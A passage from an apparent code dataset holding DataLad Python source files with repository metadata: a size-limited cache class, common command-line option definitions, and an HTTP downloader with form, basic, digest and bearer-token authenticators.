terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Simple constructs to be used as caches\n\"\"\"\n\nfrom collections import OrderedDict\n\nfrom functools import lru_cache\n\n\n# based on http://stackoverflow.com/a/2437645/1265472\nclass DictCache(OrderedDict):\n \"\"\"A simple cache (dictionary) with limited size which expunges oldest entries\n \"\"\"\n def __init__(self, *args, **kwds):\n self.size_limit = kwds.pop(\"size_limit\", None)\n OrderedDict.__init__(self, *args, **kwds)\n self._check_size_limit()\n\n def __setitem__(self, key, value):\n OrderedDict.__setitem__(self, key, value)\n self._check_size_limit()\n\n def _check_size_limit(self):\n if self.size_limit is not None:\n while len(self) > self.size_limit:\n self.popitem(last=False)\n" }, { "alpha_fraction": 0.67726069688797, "alphanum_fraction": 0.6778282523155212, "avg_line_length": 41.175533294677734, "blob_id": "d8bb702ffcd6ef018010097b6a02f3a8ce7bb1db", "content_id": "18a81ad26bc137f5125f6d6738063c65887a0a90", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15858, "license_type": "permissive", "max_line_length": 101, "num_lines": 376, "path": "/datalad/interface/common_opts.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Common interface options\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad.interface.results import known_result_xfms\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureCallable,\n EnsureChoice,\n EnsureInt,\n EnsureNone,\n EnsureStr,\n EnsureStrPrefix,\n)\n\nlocation_description = Parameter(\n args=(\"-D\", \"--description\",),\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"short description to use for a dataset location. 
Its primary\n purpose is to help humans to identify a dataset copy (e.g., \"mike's dataset\n on lab server\"). Note that when a dataset is published, this information\n becomes available on the remote side.\"\"\")\n\nrecursion_flag = Parameter(\n args=(\"-r\", \"--recursive\",),\n action=\"store_true\",\n doc=\"\"\"if set, recurse into potential subdatasets\"\"\")\n\nrecursion_limit = Parameter(\n args=(\"-R\", \"--recursion-limit\",),\n metavar=\"LEVELS\",\n constraints=EnsureInt() | EnsureNone(),\n doc=\"\"\"limit recursion into subdatasets to the given number of levels\"\"\")\n\ncontains = Parameter(\n args=('--contains',),\n metavar='PATH',\n action='append',\n doc=\"\"\"limit to the subdatasets containing the\n given path. If a root path of a subdataset is given, the last\n considered dataset will be the subdataset itself.[CMD: This\n option can be given multiple times CMD][PY: Can be a list with\n multiple paths PY], in which case datasets that\n contain any of the given paths will be considered.\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nfulfilled = Parameter(\n args=(\"--fulfilled\",),\n doc=\"\"\"DEPRECATED: use [CMD: --state CMD][PY: `state` PY]\n instead. If given, must be a boolean flag indicating whether\n to consider either only locally present or absent datasets.\n By default all subdatasets are considered regardless of their\n status.\"\"\",\n constraints=EnsureBool() | EnsureNone())\n\ndataset_state = Parameter(\n args=(\"--state\",),\n doc=\"\"\"indicate which (sub)datasets to consider: either only locally present,\n absent, or any of those two kinds.\n \"\"\",\n # yoh: intentionally left out the description of default since might be\n # command specific\n constraints=EnsureChoice('present', 'absent', 'any'))\n\nshared_access_opt = Parameter(\n args=('--shared-access',),\n metavar='MODE',\n doc=\"\"\"configure shared access to a dataset, see `git init --shared`\n documentation for complete details on the supported scenarios. 
Possible\n values include: 'false', 'true', 'group', and 'all'\"\"\")\n\nsuper_datasets_flag = Parameter(\n args=(\"-S\", \"--super-datasets\",),\n action=\"store_true\",\n doc=\"\"\"if set, save a change in a dataset also in its superdataset\"\"\")\n\ngit_opts = Parameter(\n args=(\"--git-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git` calls\"\"\")\n\ngit_clone_opts = Parameter(\n args=(\"--git-clone-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git clone` calls\"\"\")\n\nannex_opts = Parameter(\n args=(\"--annex-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex` calls\"\"\")\n\nannex_init_opts = Parameter(\n args=(\"--annex-init-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex init` calls\"\"\")\n\nannex_add_opts = Parameter(\n args=(\"--annex-add-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex add` calls\"\"\")\n\nannex_get_opts = Parameter(\n args=(\"--annex-get-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex get` calls\"\"\")\n\nannex_copy_opts = Parameter(\n args=(\"--annex-copy-opts\",),\n metavar='STRING',\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"option string to be passed to :command:`git annex copy` calls\"\"\")\n\nallow_dirty = Parameter(\n args=(\"--allow-dirty\",),\n action=\"store_true\",\n doc=\"\"\"flag that operating on a dirty repository (uncommitted or untracked content) is ok\"\"\")\n\nif_dirty_opt = Parameter(\n args=(\"--if-dirty\",),\n choices=('fail', 'save-before', 'ignore'),\n doc=\"\"\"desired behavior if a dataset with unsaved changes is discovered:\n 'fail' will trigger an error and further processing is aborted;\n 'save-before' will save all changes prior any further action;\n 'ignore' let's datalad proceed as if the dataset would not have unsaved\n changes.\"\"\")\n\nnosave_opt = Parameter(\n args=(\"--nosave\",),\n dest='save',\n action=\"store_false\",\n doc=\"\"\"by default all modifications to a dataset are immediately saved. Giving\n this option will disable this behavior.\"\"\")\n\nsave_message_opt = Parameter(\n args=(\"-m\", \"--message\",),\n metavar='MESSAGE',\n doc=\"\"\"a description of the state or the changes made to a dataset.\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nmessage_file_opt = Parameter(\n args=(\"-F\", \"--message-file\"),\n doc=\"\"\"take the commit message from this file. This flag is\n mutually exclusive with -m.\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nreckless_opt = Parameter(\n args=(\"--reckless\",),\n # if no specific mode is given, set to auto\n const='auto',\n nargs='?',\n # boolean types only for backward compatibility\n constraints=\n EnsureChoice(None, True, False, 'auto', 'ephemeral') | \\\n EnsureStrPrefix('shared-'),\n metavar='auto|ephemeral|shared-...',\n doc=\"\"\"Obtain a dataset or subdatset and set it up in a potentially \n unsafe way for performance, or access reasons. 
\n Use with care, any dataset is marked as 'untrusted'.\n The reckless mode is stored in a dataset's local configuration under\n 'datalad.clone.reckless', and will be inherited to any of its subdatasets.\n Supported modes are:\n ['auto']: hard-link files between local clones. In-place\n modification in any clone will alter original annex content.\n ['ephemeral']: symlink annex to origin's annex and discard local\n availability info via git-annex-dead 'here' and declares this annex private.\n Shares an annex between origin and clone w/o git-annex being aware of it.\n In case of a change in origin you need to update the clone before you're\n able to save new content on your end.\n Alternative to 'auto' when hardlinks are not an option, or number of consumed\n inodes needs to be minimized. Note that this mode can only be used with clones from\n non-bare repositories or a RIA store! Otherwise two different annex object tree\n structures (dirhashmixed vs dirhashlower) will be used simultaneously, and annex keys\n using the respective other structure will be inaccessible.\n ['shared-<mode>']: set up repository and annex permission to enable multi-user\n access. This disables the standard write protection of annex'ed files.\n <mode> can be any value support by 'git init --shared=', such as 'group', or\n 'all'.\"\"\")\n\njobs_opt = Parameter(\n args=(\"-J\", \"--jobs\"),\n metavar=\"NJOBS\",\n default='auto',\n constraints=EnsureInt() | EnsureNone() | EnsureChoice('auto'),\n doc=\"\"\"how many parallel jobs (where possible) to use. \"auto\" corresponds\n to the number defined by 'datalad.runtime.max-annex-jobs' configuration\n item\"\"\")\n\nverbose = Parameter(\n args=(\"-v\", \"--verbose\",),\n action=\"store_true\",\n doc=\"\"\"print out more detailed information while executing a command\"\"\")\n\n\nas_common_datasrc = Parameter(\n args=(\"--as-common-datasrc\",),\n metavar='NAME',\n doc=\"\"\"configure the created sibling as a common data source of the\n dataset that can be automatically used by all consumers of the\n dataset (technical: git-annex auto-enabled special remote)\"\"\")\n\n\npublish_depends = Parameter(\n args=(\"--publish-depends\",),\n metavar='SIBLINGNAME',\n doc=\"\"\"add a dependency such that the given existing sibling is\n always published prior to the new sibling. 
This equals setting a\n configuration item 'remote.SIBLINGNAME.datalad-publish-depends'.\n [PY: Multiple dependencies can be given as a list of sibling names\n PY][CMD: This option can be given more than once to configure multiple\n dependencies CMD]\"\"\",\n action='append',\n constraints=EnsureStr() | EnsureNone())\n\npublish_by_default = Parameter(\n args=(\"--publish-by-default\",),\n metavar='REFSPEC',\n doc=\"\"\"add a refspec to be published to this sibling by default if nothing\n specified.\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n action='append')\n\nannex_wanted_opt = Parameter(\n args=(\"--annex-wanted\",),\n metavar='EXPR',\n doc=\"\"\"expression to specify 'wanted' content for the repository/sibling.\n See https://git-annex.branchable.com/git-annex-wanted/ for more\n information\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nannex_required_opt = Parameter(\n args=(\"--annex-required\",),\n metavar='EXPR',\n doc=\"\"\"expression to specify 'required' content for the repository/sibling.\n See https://git-annex.branchable.com/git-annex-required/ for more\n information\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nannex_group_opt = Parameter(\n args=(\"--annex-group\",),\n metavar='EXPR',\n doc=\"\"\"expression to specify a group for the repository.\n See https://git-annex.branchable.com/git-annex-group/ for more\n information\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nannex_groupwanted_opt = Parameter(\n args=(\"--annex-groupwanted\",),\n metavar='EXPR',\n doc=\"\"\"expression for the groupwanted.\n Makes sense only if [PY: annex_wanted PY][CMD: --annex-wanted CMD]=\"groupwanted\"\n and annex-group is given too.\n See https://git-annex.branchable.com/git-annex-groupwanted/ for more information\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\n\ninherit_opt = Parameter(\n args=(\"--inherit\",),\n action=\"store_true\",\n doc=\"\"\"if sibling is missing, inherit settings (git config, git annex\n wanted/group/groupwanted) from its super-dataset\"\"\")\n\nmissing_sibling_opt = Parameter(\n args=(\"--missing\",),\n constraints=EnsureChoice('fail', 'inherit', 'skip'), # may be inherit-skip\n metavar='MODE',\n doc=\"\"\"action to perform, if a sibling does not exist in a given dataset.\n By default it would fail the run ('fail' setting). With 'inherit' a\n 'create-sibling' with '--inherit-settings' will be used to create sibling\n on the remote. With 'skip' - it simply will be skipped.\"\"\")\n\nwith_plugin_opt = Parameter(\n args=('--with-plugin',),\n nargs='*',\n action='append',\n metavar='PLUGINSPEC',\n doc=\"\"\"DataLad plugin to run in addition. PLUGINSPEC is a list\n comprised of a plugin name plus optional `key=value` pairs with arguments\n for the plugin call (see `plugin` command documentation for details).\n [PY: PLUGINSPECs must be wrapped in list where each item configures\n one plugin call. Plugins are called in the order defined by this list.\n PY][CMD: This option can be given more than once to run multiple plugins\n in the order in which they are given. CMD]\"\"\")\n\n# define parameters to be used by eval_results to tune behavior\n# Note: This is done outside eval_results in order to be available when building\n# docstrings for the decorated functions\n# TODO: May be we want to move them to be part of the classes _params. 
Depends\n# on when and how eval_results actually has to determine the class.\n# Alternatively build a callable class with these to even have a fake signature\n# that matches the parameters, so they can be evaluated and defined the exact\n# same way.\n\neval_params = dict(\n return_type=Parameter(\n doc=\"\"\"return value behavior switch. If 'item-or-list' a single\n value is returned instead of a one-item return value list, or a\n list in case of multiple return values. `None` is return in case\n of an empty list.\"\"\",\n default='list',\n constraints=EnsureChoice('generator', 'list', 'item-or-list')),\n result_filter=Parameter(\n doc=\"\"\"if given, each to-be-returned\n status dictionary is passed to this callable, and is only\n returned if the callable's return value does not\n evaluate to False or a ValueError exception is raised. If the given\n callable supports `**kwargs` it will additionally be passed the\n keyword arguments of the original API call.\"\"\",\n constraints=EnsureCallable() | EnsureNone()),\n result_xfm=Parameter(\n doc=\"\"\"if given, each to-be-returned result\n status dictionary is passed to this callable, and its return value\n becomes the result instead. This is different from\n `result_filter`, as it can perform arbitrary transformation of the\n result value. This is mostly useful for top-level command invocations\n that need to provide the results in a particular format. Instead of\n a callable, a label for a pre-crafted result transformation can be\n given.\"\"\",\n constraints=EnsureChoice(*list(known_result_xfms.keys())) | EnsureCallable() | EnsureNone()),\n result_renderer=Parameter(\n doc=\"\"\"select rendering mode command results.\n 'tailored' enables a command-specific rendering style that is typically\n tailored to human consumption, if there is one for a specific\n command, or otherwise falls back on the the 'generic' result renderer;\n 'generic' renders each result in one line with key info like action,\n status, path, and an optional message);\n 'json' a complete JSON line serialization of the full result record;\n 'json_pp' like 'json', but pretty-printed spanning multiple lines;\n 'disabled' turns off result rendering entirely;\n '<template>' reports any value(s) of any result properties in any\n format indicated by the template (e.g. '{path}', compare with JSON\n output for all key-value choices). The template syntax follows the\n Python \"format() language\". It is possible to report individual\n dictionary values, e.g. '{metadata[name]}'. If a 2nd-level key contains\n a colon, e.g. 'music:Genre', ':' must be substituted by '#' in the\n template, like so: '{metadata[music#Genre]}'.\"\"\",\n default='tailored'),\n on_failure=Parameter(\n doc=\"\"\"behavior to perform on failure: 'ignore' any failure is reported,\n but does not cause an exception; 'continue' if any failure occurs an\n exception will be raised at the end, but processing other actions will\n continue for as long as possible; 'stop': processing will stop on first\n failure and an exception is raised. A failure is any result with status\n 'impossible' or 'error'. Raised exception is an IncompleteResultsError\n that carries the result dictionaries of the failures in its `failed`\n attribute.\"\"\",\n default='continue',\n constraints=EnsureChoice('ignore', 'continue', 'stop')),\n)\n\neval_defaults = {\n k: p.cmd_kwargs.get('default', None)\n for k, p in eval_params.items()\n}\n\"\"\"\\\n.. deprecated:: 0.16\n This variable will be removed in a future release. 
The default values for\n all Parameters (possibly overriding by command-specific settings) are now\n available as :class:`Interface` attributes.\n\"\"\"\n" }, { "alpha_fraction": 0.6001362204551697, "alphanum_fraction": 0.6055838465690613, "avg_line_length": 40.15339279174805, "blob_id": "c6b791d89b144eb2c87ad75e06fc5e612a953362", "content_id": "bac25f00337e5964f5588ba5142fe361507b8a4b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27902, "license_type": "permissive", "max_line_length": 121, "num_lines": 678, "path": "/datalad/downloaders/http.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Provide access to stuff (html, data files) via HTTP and HTTPS\n\n\"\"\"\nimport re\nimport requests\nimport requests.auth\nfrom requests.utils import parse_dict_header\n\n# at some point was trying to be too specific about which exceptions to\n# catch for a retry of a download.\n# from urllib3.exceptions import MaxRetryError, NewConnectionError\n\nimport io\nfrom time import sleep\n\nfrom .. import __version__\nfrom ..utils import (\n ensure_list_from_str,\n ensure_dict_from_str,\n ensure_bytes,\n)\nfrom ..dochelpers import borrowkwargs\n\nfrom ..ui import ui\nfrom ..utils import auto_repr\nfrom ..support.network import get_url_filename\nfrom ..support.network import get_response_disposition_filename\nfrom ..support.network import rfc2822_to_epoch\nfrom ..support.cookies import cookies_db\nfrom ..support.status import FileStatus\nfrom ..support.exceptions import (\n AccessDeniedError,\n AccessFailedError,\n CapturedException,\n DownloadError,\n UnhandledRedirectError,\n)\n\nfrom .base import Authenticator\nfrom .base import BaseDownloader, DownloaderSession\n\nfrom logging import getLogger\nfrom ..log import LoggerHelper\nlgr = getLogger('datalad.http')\n\n# Following https://meta.wikimedia.org/wiki/User-Agent_policy to provide\n# extended and informative User-Agent string\nDEFAULT_USER_AGENT = \\\n f'DataLad/{__version__} ' \\\n '(https://datalad.org; [email protected]) ' \\\n f'python-requests/{requests.__version__}'\n\ntry:\n import requests_ftp\n _FTP_SUPPORT = True\n requests_ftp.monkeypatch_session()\nexcept ImportError as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to import requests_ftp, thus no ftp support: %s\", ce)\n _FTP_SUPPORT = False\n\nif lgr.getEffectiveLevel() <= 1:\n # Let's also enable requests etc debugging\n\n # These two lines enable debugging at httplib level (requests->urllib3->http.client)\n # You will see the REQUEST, including HEADERS and DATA, and RESPONSE with HEADERS but without DATA.\n # The only thing missing will be the response.body which is not logged.\n import http.client\n # TODO: nohow wrapped with logging, plain prints (heh heh), so formatting will not be consistent\n http.client.HTTPConnection.debuglevel = 1\n\n # for requests we can define logging properly\n requests_log = LoggerHelper(logtarget=\"requests.packages.urllib3\").get_initialized_logger()\n requests_log.setLevel(lgr.getEffectiveLevel())\n requests_log.propagate = True\n\n__docformat__ = 
'restructuredtext'\n\n\ndef process_www_authenticate(v):\n if not v:\n return []\n # TODO: provide proper parsing/handling of this custom format and wider support:\n # <type> realm=<realm>[, charset=\"UTF-8\"]\n # More notes: https://github.com/datalad/datalad/issues/5846#issuecomment-890221053\n # The most complete solution is from 2018 on https://stackoverflow.com/a/52462292/1265472\n # relying on parsing it using pyparsing.\n supported_type = v.split(' ')[0].lower()\n our_type = {\n 'basic': 'http_basic_auth',\n 'digest': 'http_digest_auth',\n # TODO: bearer_token_anon ?\n }.get(supported_type)\n return [our_type] if our_type else []\n\n\ndef check_response_status(response, err_prefix=\"\", session=None):\n \"\"\"Check if response's status_code signals problem with authentication etc\n\n ATM succeeds only if response code was 200\n \"\"\"\n if not err_prefix:\n err_prefix = \"Access to %s has failed: \" % response.url\n # 401 would be for digest authentication mechanism, or if we first ask which mechanisms are\n # supported.... must be linked into the logic if we decide to automagically detect which\n # mechanism or to give more sensible error message\n err_msg = err_prefix + \"status code %d\" % response.status_code\n if response.status_code in {404}:\n # It could have been that form_url is wrong, so let's just say that\n # TODO: actually may be that is where we could use tagid and actually determine the form submission url\n raise DownloadError(err_prefix + \"not found\")\n elif 400 <= response.status_code < 500:\n raise AccessDeniedError(\n err_msg,\n supported_types=process_www_authenticate(\n response.headers.get('WWW-Authenticate')),\n status=response.status_code)\n elif response.status_code in {200}:\n pass\n elif response.status_code in {301, 302, 307}:\n # TODO: apparently tests do not exercise this one yet\n if session is None:\n raise AccessFailedError(err_msg + \" no session was provided\",\n status=response.status_code)\n redirs = list(session.resolve_redirects(response, response.request))\n if len(redirs) > 1:\n lgr.warning(\"Multiple redirects aren't supported yet. Taking first\")\n elif len(redirs) == 0:\n raise AccessFailedError(\"No redirects were resolved\",\n status=response.status_code)\n raise UnhandledRedirectError(err_msg, url=redirs[0].url,\n status=response.status_code)\n else:\n raise AccessFailedError(err_msg, status=response.status_code)\n\n\n@auto_repr\nclass HTTPBaseAuthenticator(Authenticator):\n \"\"\"Base class for html_form and http_auth authenticators\n \"\"\"\n def __init__(self, url=None, failure_re=None, success_re=None,\n session_cookies=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n url : str, optional\n URL where to find the form/login to authenticate. 
If not provided, an original query url\n which will be provided to the __call__ of the authenticator will be used\n failure_re : str or list of str, optional\n success_re : str or list of str, optional\n Regular expressions to determine if login has failed or succeeded.\n TODO: we might condition when it gets ran\n session_cookies : str or list of str, optional\n Session cookies to store (besides auth response cookies)\n \"\"\"\n super(HTTPBaseAuthenticator, self).__init__(**kwargs)\n self.url = url\n self.failure_re = ensure_list_from_str(failure_re)\n self.success_re = ensure_list_from_str(success_re)\n self.session_cookies = ensure_list_from_str(session_cookies)\n\n def authenticate(self, url, credential, session, update=False):\n # we should use specified URL for this authentication first\n lgr.info(\"http session: Authenticating into session for %s\", url)\n post_url = self.url if self.url else url\n credential.set_context(auth_url=post_url)\n credentials = credential()\n\n # The whole thing relies on server first spitting out 401\n # and client getting again with 'Authentication:' header\n # So we need custom handling for those, while keeping track not\n # of cookies per se, but of 'Authentication:' header which is\n # to be used in subsequent GETs\n response = self._post_credential(credentials, post_url, session)\n if response is None:\n # authentication did not involve any interaction, nothing to\n # check at this point\n return\n\n # Handle responses if there was initial authentication exchange,\n # e.g. posting to a form and getting a cookie etc\n err_prefix = \"Authentication to %s failed: \" % post_url\n try:\n check_response_status(response, err_prefix, session=session)\n except DownloadError:\n # It might have happened that the return code was 'incorrect'\n # and we did get some feedback, which we could analyze to\n # figure out actual problem. E.g. in case of nersc of crcns\n # it returns 404 (not found) with text in the html\n if response is not None and response.text:\n self.check_for_auth_failure(response.text, err_prefix)\n raise\n\n response_text = response.text\n self.check_for_auth_failure(response_text, err_prefix)\n\n if self.success_re:\n # the one which must be used to verify success\n # verify that we actually logged in\n for success_re in self.success_re:\n if not re.search(success_re, response_text):\n raise AccessDeniedError(\n err_prefix + \" returned output did not match 'success' regular expression %s\" % success_re\n )\n\n cookies_dict = {}\n if response.cookies:\n cookies_dict = requests.utils.dict_from_cookiejar(response.cookies)\n if self.session_cookies:\n # any session cookies to store\n cookies_dict.update({k: session.cookies[k] for k in self.session_cookies})\n\n if cookies_dict:\n if (url in cookies_db) and update:\n cookies_db[url].update(cookies_dict)\n else:\n cookies_db[url] = cookies_dict\n # assign cookies for this session\n for c, v in cookies_dict.items():\n if c not in session.cookies or session.cookies[c] != v:\n session.cookies[c] = v # .update(cookies_dict)\n\n return response\n\n def _post_credential(self, credentials, post_url, session):\n raise NotImplementedError(\"Must be implemented in subclass\")\n\n def check_for_auth_failure(self, content, err_prefix=\"\"):\n if self.failure_re:\n content_is_bytes = isinstance(content, bytes)\n # verify that we actually logged in\n for failure_re in self.failure_re:\n if content_is_bytes:\n # content could be not in utf-8. 
But I do not think that\n # it is worth ATM messing around with guessing encoding\n # of the content to figure out what to encode it into\n # since typically returned \"auth failed\" should be in\n # utf-8 or plain ascii\n failure_re = ensure_bytes(failure_re)\n if re.search(failure_re, content):\n raise AccessDeniedError(\n err_prefix + \"returned output which matches regular expression %s\" % failure_re\n )\n\n\n@auto_repr\nclass HTMLFormAuthenticator(HTTPBaseAuthenticator):\n \"\"\"Authenticate by opening a session via POSTing to HTML form\n \"\"\"\n\n def __init__(self, fields, tagid=None, **kwargs):\n \"\"\"\n\n Example specification in the .ini config file\n [provider:crcns]\n ...\n credential = crcns ; is not given to authenticator as is\n authentication_type = html_form\n # TODO: may be rename into post_url\n html_form_url = https://crcns.org/login_form\n # probably not needed actually since form_url\n # html_form_tagid = login_form\n html_form_fields = __ac_name={user}\n __ac_password={password}\n submit=Log in\n form.submitted=1\n js_enabled=0\n cookies_enabled=\n html_form_failure_re = (Login failed|Please log in)\n html_form_success_re = You are now logged in\n\n Parameters\n ----------\n fields : str or dict\n String or a dictionary, which will be used (along with credential) information\n to feed into the form\n tagid : str, optional\n id of the HTML <form> in the document to use. If None, and page contains a single form,\n that one will be used. If multiple forms -- error will be raise\n **kwargs : dict, optional\n Passed to super class HTTPBaseAuthenticator\n \"\"\"\n super(HTMLFormAuthenticator, self).__init__(**kwargs)\n self.fields = ensure_dict_from_str(fields)\n self.tagid = tagid\n\n def _post_credential(self, credentials, post_url, session):\n post_fields = {\n k: v.format(**credentials)\n for k, v in self.fields.items()\n }\n\n response = session.post(post_url, data=post_fields)\n lgr.debug(\"Posted to %s fields %s, got response %s with headers %s\",\n post_url, list(post_fields.keys()), response,\n list(response.headers.keys()))\n return response\n\n\n@auto_repr\nclass HTTPRequestsAuthenticator(HTTPBaseAuthenticator):\n \"\"\"Base class for various authenticators using requests pre-crafted ones\n\n\n Note, that current implementation assumes REQUESTS_FIELDS to be identical to\n the keys of a `Credential` object's FIELDS.\n \"\"\"\n\n REQUESTS_AUTHENTICATOR = None\n REQUESTS_FIELDS = ('user', 'password')\n\n def __init__(self, **kwargs):\n # so we have __init__ solely for a custom docstring\n super(HTTPRequestsAuthenticator, self).__init__(**kwargs)\n\n def _post_credential(self, credentials, post_url, session):\n authenticator = self.REQUESTS_AUTHENTICATOR(\n *[credentials[f] for f in self.REQUESTS_FIELDS])\n session.auth = authenticator\n\n\n@auto_repr\nclass HTTPBasicAuthAuthenticator(HTTPRequestsAuthenticator):\n \"\"\"Authenticate via basic HTTP authentication\n\n Example specification in the .ini config file\n [provider:hcp-db]\n ...\n credential = hcp-db\n authentication_type = http_auth\n\n Parameters\n ----------\n **kwargs : dict, optional\n Passed to super class HTTPBaseAuthenticator\n \"\"\"\n\n REQUESTS_AUTHENTICATOR = requests.auth.HTTPBasicAuth\n\n\n@auto_repr\nclass HTTPAuthAuthenticator(HTTPRequestsAuthenticator):\n \"\"\"Authenticate via Basic authentication to some other post url\n\n TODO: actually this is some remnants which might later were RFed\n into the form authenticator since otherwise they make little sense\n \"\"\"\n\n 
REQUESTS_AUTHENTICATOR = requests.auth.HTTPBasicAuth\n\n def _post_credential(self, credentials, post_url, session):\n authenticator = self.REQUESTS_AUTHENTICATOR(\n *[credentials[f] for f in self.REQUESTS_FIELDS])\n session.auth = authenticator\n response = session.post(post_url, data={},\n auth=authenticator)\n auth_request = response.headers.get('www-authenticate')\n if response.status_code == 401 and auth_request:\n if auth_request.lower().split(' ', 1)[0] == 'basic':\n if response.url != post_url:\n # was instructed to authenticate elsewhere\n # TODO: do we need to loop may be??\n response2 = session.get(response.url, auth=authenticator)\n return response2\n else:\n lgr.warning(\n f\"{self} received response with www-authenticate={auth_request!r} \"\n \"which is not Basic, and thus it cannot handle ATM.\")\n return response\n\n\n@auto_repr\nclass HTTPDigestAuthAuthenticator(HTTPRequestsAuthenticator):\n \"\"\"Authenticate via HTTP digest authentication\n \"\"\"\n\n REQUESTS_AUTHENTICATOR = requests.auth.HTTPDigestAuth\n\n\n@auto_repr\nclass HTTPBearerTokenAuthenticator(HTTPRequestsAuthenticator):\n \"\"\"Authenticate via HTTP Authorization header\n \"\"\"\n\n DEFAULT_CREDENTIAL_TYPE = 'token'\n\n def __init__(self, **kwargs):\n # so we have __init__ solely for a custom docstring\n super(HTTPBearerTokenAuthenticator, self).__init__(**kwargs)\n\n def _post_credential(self, credentials, post_url, session):\n # we do not need to post anything, just inject token into the session\n session.headers['Authorization'] = \"Bearer %s\" % credentials['token']\n\n\n@auto_repr\nclass HTTPAnonBearerTokenAuthenticator(HTTPBearerTokenAuthenticator):\n \"\"\"Retrieve token via 401 response and add Authorization: Bearer header.\n \"\"\"\n\n allows_anonymous = True\n\n def authenticate(self, url, credential, session, update=False):\n if credential:\n lgr.warning(\n \"Argument 'credential' specified, but it will be ignored: %s\",\n credential)\n response = session.head(url)\n status = response.status_code\n if status == 200:\n lgr.debug(\"No authorization needed for %s\", url)\n return\n if status != 401:\n raise DownloadError(\n \"Expected 200 or 401 but got {} from {}\"\n .format(status, url))\n\n lgr.debug(\"Requesting authorization token for %s\", url)\n # TODO: it is not RFC 2068 Section 2 format, but a custom\n # <type> realm=<realm>[, charset=\"UTF-8\"]\n # see TODO/harmonize with process_www_authenticate\n auth_parts = parse_dict_header(response.headers[\"www-authenticate\"])\n auth_url = (\"{}?service={}&scope={}\"\n .format(auth_parts[\"Bearer realm\"],\n auth_parts[\"service\"],\n auth_parts[\"scope\"]))\n auth_response = session.get(auth_url)\n try:\n auth_info = auth_response.json()\n except ValueError as e:\n raise DownloadError(\n \"Failed to get information from {}\"\n .format(auth_url)) from e\n session.headers['Authorization'] = \"Bearer \" + auth_info[\"token\"]\n\n\n@auto_repr\nclass HTTPDownloaderSession(DownloaderSession):\n def __init__(self, size=None, filename=None, url=None, headers=None,\n response=None, chunk_size=1024 ** 2):\n super(HTTPDownloaderSession, self).__init__(\n size=size, filename=filename, url=url, headers=headers,\n )\n self.chunk_size = chunk_size\n self.response = response\n\n def download(self, f=None, pbar=None, size=None):\n response = self.response\n # content_gzipped = 'gzip' in response.headers.get('content-encoding', '').split(',')\n # if content_gzipped:\n # raise NotImplemented(\"We do not support (yet) gzipped content\")\n # # see 
https://rationalpie.wordpress.com/2010/06/02/python-streaming-gzip-decompression/\n # # for ways to implement in python 2 and 3.2's gzip is working better with streams\n\n total = 0\n return_content = f is None\n if f is None:\n # no file to download to\n # TODO: actually strange since it should have been decoded then...\n f = io.BytesIO()\n\n # must use .raw to be able avoiding decoding/decompression while downloading\n # to a file\n chunk_size_ = min(self.chunk_size, size) if size is not None else self.chunk_size\n\n # XXX With requests_ftp BytesIO is provided as response.raw for ftp urls,\n # which has no .stream, so let's do ducktyping and provide our custom stream\n # via BufferedReader for such cases, while maintaining the rest of code\n # intact. TODO: figure it all out, since doesn't scale for any sizeable download\n # This code is tested by tests/test_http.py:test_download_ftp BUT\n # it causes 503 on travis, but not always so we allow to skip that test\n # in such cases. That causes fluctuating coverage\n if not hasattr(response.raw, 'stream'): # pragma: no cover\n def _stream():\n buf = io.BufferedReader(response.raw)\n v = True\n while v:\n v = buf.read(chunk_size_)\n yield v\n\n stream = _stream()\n else:\n # XXX TODO -- it must be just a dirty workaround\n # As we discovered with downloads from NITRC all headers come with\n # Content-Encoding: gzip which leads requests to decode them. But the point\n # is that ftp links (yoh doesn't think) are gzip compressed for the transfer\n decode_content = not response.url.startswith('ftp://')\n stream = response.raw.stream(chunk_size_, decode_content=decode_content)\n\n for chunk in stream:\n if chunk: # filter out keep-alive new chunks\n chunk_len = 